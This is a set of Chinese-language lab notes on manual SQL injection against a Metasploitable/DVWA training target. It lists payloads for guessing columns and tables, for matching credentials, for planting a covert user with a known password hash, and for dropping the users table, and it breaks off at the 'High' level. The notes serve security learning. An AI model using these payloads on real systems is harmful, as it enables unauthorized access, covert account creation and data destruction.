SQL手工注入
靶机:metasploitable(低)
1、当无权读取infomation_schema库【MySQL最重要的源数据库,必须有root权限】/拒绝union、order by语句
#若不为root
a.猜列名: ' and coclumn is null--+ 【并且列有一个字段为空,正常执行,若没有空字段,且该列存在,返回空白内容;若列不存在,则报错】(可确定语句可插入数据库运行)
例如:' and asd is null--+ 
使用kali集成的字典文件
#对字典中以#号开头的行过滤【cat common-colums.txt | grep -V ^# > column.txt】
BurpSuite自动猜列名(使用字典文件)【不一定是全部列】
#也可通过返回的长度(length)来筛选
b.猜测当前表名: ' and table.user is null--+ 【(user为已确定存在列名)如果列有字段为空,返回表名,若没有空字段,不会返回结果,若表名不存在,会报错】
#还可通过db.table.user猜测数据库名称【同样的方法】
kali中查找表名集成文件
cat /usr/share/golismero/tools/sqlmap/txt/common-tables.txt | grep -v ^# > table.txt
#通常来说,表名应该只有一个,不排除存在其他表名
c.猜测库里其他表: ' and (select count(*) from table)>0--+ 【统计表中记录,若大于0,表名存在,可能直接爆出库名和表名】
#同上,使用burpsuite
d.列表对应关系: ' and users.user is null--+
#通过上述方法,整理出已知列名文件
e.猜字段内容:
' or user='admin 【后面为真,则显示,证明该内容存在】
' or user like '%a% 【通配符,只要字段中包含a,则显示】
f.猜账号对应密码: 'or user='admin' and password='1h29rwg27g9agf9291r9
#可使用md5sum命令进行加密
2、当数据库可写入【前提,数据库配置的权限足够】
a. ';update users set user='root' where user='admin' 【直接修改其账号/密码(密码为自己设定的密码的MD5值)将admin更新为root】
#但是在dvwa中无法运行该语句,是sql客户端的问题代码存在问题,导致注入失败【原因】
数据库密码破解程序HexoBase,同时也是数据库连接的客户端程序
b.'; INSERT INTO users (' user_id',' first_name',' last_name','user','password','avatar') VALUES('35','fh','root','toor','5f4dcc3b5aa765d61d8327deb882cf99','OK');--+ 【插入:添加一个新用户,可隐秘行事】
c.DROP TABLE users;-- 【删除表】
#利用数据库管理系统中默认的存储过程进行注入 【xp_cmdshell /存储过程】
#SQL注入没有通用的方法,掌握原理,了解各种数据库特性
3、SQL注入难度提升讲解
low
medium
代码分析:$id:该变量不需要使用单引号闭合,也不需要使用--进行注释,所以注入之前中已不需要加单引号进行,过滤函数已为多余
#mysql_real_escape_string() 【php5.5.0已经弃用该函数,PHP 7.0.0已经删除该函数,使用MySQLi、PDO_MySQL代替】
转义函数,对以下下列字符转义
High
